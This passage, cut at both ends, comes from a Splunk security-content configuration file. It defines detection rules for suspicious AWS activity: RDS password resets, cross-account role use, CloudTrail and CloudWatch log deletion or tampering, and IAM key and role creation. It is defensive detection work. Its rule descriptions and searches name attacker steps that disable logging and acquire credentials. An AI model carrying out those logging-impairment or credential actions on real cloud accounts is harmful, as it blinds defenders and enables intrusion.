quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource="rds.amazonaws.com" eventName=ModifyDBInstance "requestParameters.masterUserPassword"=* | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.dBInstanceIdentifier) as database_id by src awsRegion eventName userAgent user_arn| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_credential_access_rds_password_reset_filter`

[ESCU - AWS Cross Account Activity From Previously Unseen Account - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AssumeRole events where an IAM role in a different account is requested for the first time.
action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search looks for AssumeRole events where an IAM role in a different account is requested for the first time.
action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen AWS Cross Account Activity - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen AWS Cross Account Activity - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `aws_cross_account_activity_from_previously_unseen_account_filter` macro.
action.escu.known_false_positives = Using multiple AWS accounts and roles is perfectly valid behavior. It is suspicious when an account requests privileges of an account it has not requested before. You should validate with the account owner that this is a legitimate request.
action.escu.creation_date = 2020-05-28
action.escu.modification_date = 2020-05-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Cross Account Activity From Previously Unseen Account - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud Authentication Activities"]
action.risk = 1
action.risk.param._risk_message = AWS account $requestingAccountId$ is trying to access a resource from another account $requestedAccountId$ for the first time.
action.risk.param._risk = [{"risk_object_field": "requestingAccountId", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - AWS Cross Account Activity From Previously Unseen Account - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Authentication Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)` | rex field=user_role "arn:aws:sts:*:(?<dest_account>.*):" | where vendor_account != dest_account | rename vendor_account as requestingAccountId dest_account as requestedAccountId | lookup previously_seen_aws_cross_account_activity requestingAccountId, requestedAccountId, OUTPUTNEW firstTime | eval status = if(firstTime > relative_time(now(), "-24h@h"),"New Cross Account Activity","Previously Seen") | where status = "New Cross Account Activity" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_cross_account_activity_from_previously_unseen_account_filter`

[ESCU - AWS Defense Evasion Delete Cloudtrail - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and enable CloudTrail logs in your AWS environment.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped CloudTrail logging. Please investigate this activity.
action.escu.creation_date = 2022-07-13
action.escu.modification_date = 2022-07-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Defense Evasion Delete Cloudtrail - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Defense Evasion"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has deleted CloudTrail logging for account id $aws_account_id$ from IP $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Defense Evasion Delete Cloudtrail - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the entire CloudTrail trail that is logging activities in the environment.
action.notable.param.rule_title = AWS Defense Evasion Delete Cloudtrail
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = DeleteTrail eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as deleted_cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_delete_cloudtrail_filter`

[ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and enable CloudTrail logs in your AWS environment.
action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has deleted CloudWatch logging. Please investigate this activity.
action.escu.creation_date = 2022-07-17
action.escu.modification_date = 2022-07-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Defense Evasion"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has deleted a CloudWatch logging group for account id $aws_account_id$ from IP $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment.
action.notable.param.rule_title = AWS Defense Evasion Delete CloudWatch Log Group
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName = DeleteLogGroup eventSource = logs.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.logGroupName) as log_group_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_delete_cloudwatch_log_group_filter`

[ESCU - AWS Defense Evasion Impair Security Services - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for several delete-specific API calls made to AWS security services such as CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the CloudWatch alarm, deleting a set of detectors from your GuardDuty environment, or simply deleting a number of CloudWatch alarms to remain stealthy and avoid detection.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = ["Web"]
action.escu.eli5 = This analytic looks for several delete-specific API calls made to AWS security services such as CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the CloudWatch alarm, deleting a set of detectors from your GuardDuty environment, or simply deleting a number of CloudWatch alarms to remain stealthy and avoid detection.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and enable CloudTrail logs in your AWS environment.
action.escu.known_false_positives = While this search has no known false positives, it is possible that it is legitimate admin activity. Please consider filtering out these noisy events using the userAgent and user_arn field names.
action.escu.creation_date = 2022-07-26
action.escu.modification_date = 2022-07-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Defense Evasion Impair Security Services - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS Defense Evasion"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Defense Evasion Impair Security Services - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName IN ("DeleteLogStream","DeleteDetector","DeleteIPSet","DeleteWebACL","DeleteRule","DeleteRuleGroup","DeleteLoggingConfiguration","DeleteAlarms") | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName values(eventSource) as eventSource values(requestParameters.*) as * by src region user_arn aws_account_id user_type user_agent errorCode| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_defense_evasion_impair_security_services_filter`

[ESCU - AWS Defense Evasion PutBucketLifecycle - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies `PutBucketLifecycle` events in CloudTrail logs where a user has created a new lifecycle rule for an S3 bucket with a short expiration period. Attackers may use this API call to impair CloudTrail logging by changing the object expiration of the S3 bucket to 1 day, after which the CloudTrail logs stored in the bucket are deleted.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies `PutBucketLifecycle` events in CloudTrail logs where a user has created a new lifecycle rule for an S3 bucket with a short expiration period. Attackers may use this API call to impair CloudTrail logging by changing the object expiration of the S3 bucket to 1 day, after which the CloudTrail logs stored in the bucket are deleted.
action.escu.how_to_implement = You must install the Splunk AWS Add-on and enable CloudTrail logs in your AWS environment. We recommend that users set the expiration days value according to their company's log retention policies.
action.escu.known_false_positives = While this search has no known false positives, it is possible that it is legitimate admin activity. Please consider filtering out these noisy events using the userAgent and user_arn field names.
action.escu.creation_date = 2022-07-25 action.escu.modification_date = 2022-07-25 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion PutBucketLifecycle - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion PutBucketLifecycle - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 40, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=PutBucketLifecycle user_type=IAMUser errorCode=success | spath path=requestParameters{}.LifecycleConfiguration{}.Rule{}.Expiration{}.Days output=expiration_days | spath path=requestParameters{}.bucketName output=bucket_name | stats count min(_time) as firstTime max(_time) as lastTime by src region eventName userAgent user_arn aws_account_id expiration_days bucket_name user_type| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where expiration_days < 3 | `aws_defense_evasion_putbucketlifecycle_filter` [ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies `StopLogging` events in CloudTrail logs. 
Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies `StopLogging` events in CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. action.escu.how_to_implement = You must install Splunk AWS Add on and enable Cloudtrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped cloudtrail logging. Please investigate this activity. 
action.escu.creation_date = 2022-07-12 action.escu.modification_date = 2022-07-12 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has stopped Cloudtrail logging for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Stop Logging Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies `StopLogging` events in CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their macliious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may easily stop logging. 
action.notable.param.rule_title = AWS Defense Evasion Stop Logging Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = StopLogging eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as stopped_cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_defense_evasion_stop_logging_cloudtrail_filter` [ESCU - AWS Defense Evasion Update Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies `UpdateTrail` events in CloudTrail logs. Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies `UpdateTrail` events in CloudTrail logs. Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. 
When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has updated cloudtrail logging. Please investigate this activity. action.escu.creation_date = 2022-07-17 action.escu.modification_date = 2022-07-17 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Update Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has updated a cloudtrail logging for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Update Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies `UpdateTrail` events in CloudTrail logs. 
Attackers may evade the logging capability by updating the settings and impairing them with wrong parameters. For example, Attackers may change the multi-regional log into a single region logs, which evades the logging for other regions. When the adversary has the right type of permissions in the compromised AWS environment, they may update the CloudTrail settings that is logging activities in your environment. action.notable.param.rule_title = AWS Defense Evasion Update Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = UpdateTrail eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_update_cloudtrail_filter` [ESCU - aws detect attach to role policy - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of an user attaching itself to a different role trust policy. This can be used for lateral movement and escalation of privileges. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of an user attaching itself to a different role trust policy. This can be used for lateral movement and escalation of privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Attach to policy can create a lot of noise. This search can be adjusted to provide specific values to identify cases of abuse (i.e status=failure). The search can provide context for common users attaching themselves to higher privilege policies or even newly created policies. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect attach to role policy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect attach to role policy - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` attach policy| spath requestParameters.policyArn | table 
sourceIPAddress user_access_key userIdentity.arn userIdentity.sessionContext.sessionIssuer.arn eventName errorCode errorMessage status action requestParameters.policyArn userIdentity.sessionContext.attributes.mfaAuthenticated userIdentity.sessionContext.attributes.creationDate | `aws_detect_attach_to_role_policy_filter` [ESCU - aws detect permanent key creation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and they are only needed for programmatic calls. Creation of Permanent key is an important event to monitor. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of accounts creating permanent keys. Permanent keys are not created by default and they are only needed for programmatic calls. Creation of Permanent key is an important event to monitor. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = Not all permanent key creations are malicious. If there is a policy of rotating keys this search can be adjusted to provide better context. 
action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect permanent key creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect permanent key creation - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` CreateAccessKey | spath eventName | search eventName=CreateAccessKey "userIdentity.type"=IAMUser | table sourceIPAddress userName userIdentity.type userAgent action status responseElements.accessKey.createDate responseElements.accessKey.status responseElements.accessKey.accessKeyId |`aws_detect_permanent_key_creation_filter` [ESCU - aws detect role creation - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of role creation by IAM users. 
Role creation is an event by itself if user is creating a new role with trust policies different than the available in AWS and it can be used for lateral movement and escalation of privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of role creation by IAM users. Role creation is an event by itself if user is creating a new role with trust policies different than the available in AWS and it can be used for lateral movement and escalation of privileges. action.escu.how_to_implement = You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs action.escu.known_false_positives = CreateRole is not very common in common users. This search can be adjusted to provide specific values to identify cases of abuse. In general AWS provides plenty of trust policies that fit most use cases. 
action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect role creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect role creation - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_cloudwatchlogs_eks` event_name=CreateRole action=created userIdentity.type=AssumedRole requestParameters.description=Allows* | table sourceIPAddress userIdentity.principalId userIdentity.arn action event_name awsRegion http_user_agent mfa_auth msg requestParameters.roleName requestParameters.description responseElements.role.arn responseElements.role.createDate | `aws_detect_role_creation_filter` [ESCU - aws detect sts assume role abuse - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. 
This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides detection of suspicious use of sts:AssumeRole. These tokens can be created on the go and used by attackers to move laterally and escalate privileges. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs action.escu.known_false_positives = Sts:AssumeRole can be very noisy as it is a standard mechanism to provide cross account and cross resources access. This search can be adjusted to provide specific values to identify cases of abuse. action.escu.creation_date = 2020-07-27 action.escu.modification_date = 2020-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - aws detect sts assume role abuse - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Cross Account Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - aws detect sts assume role abuse - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity 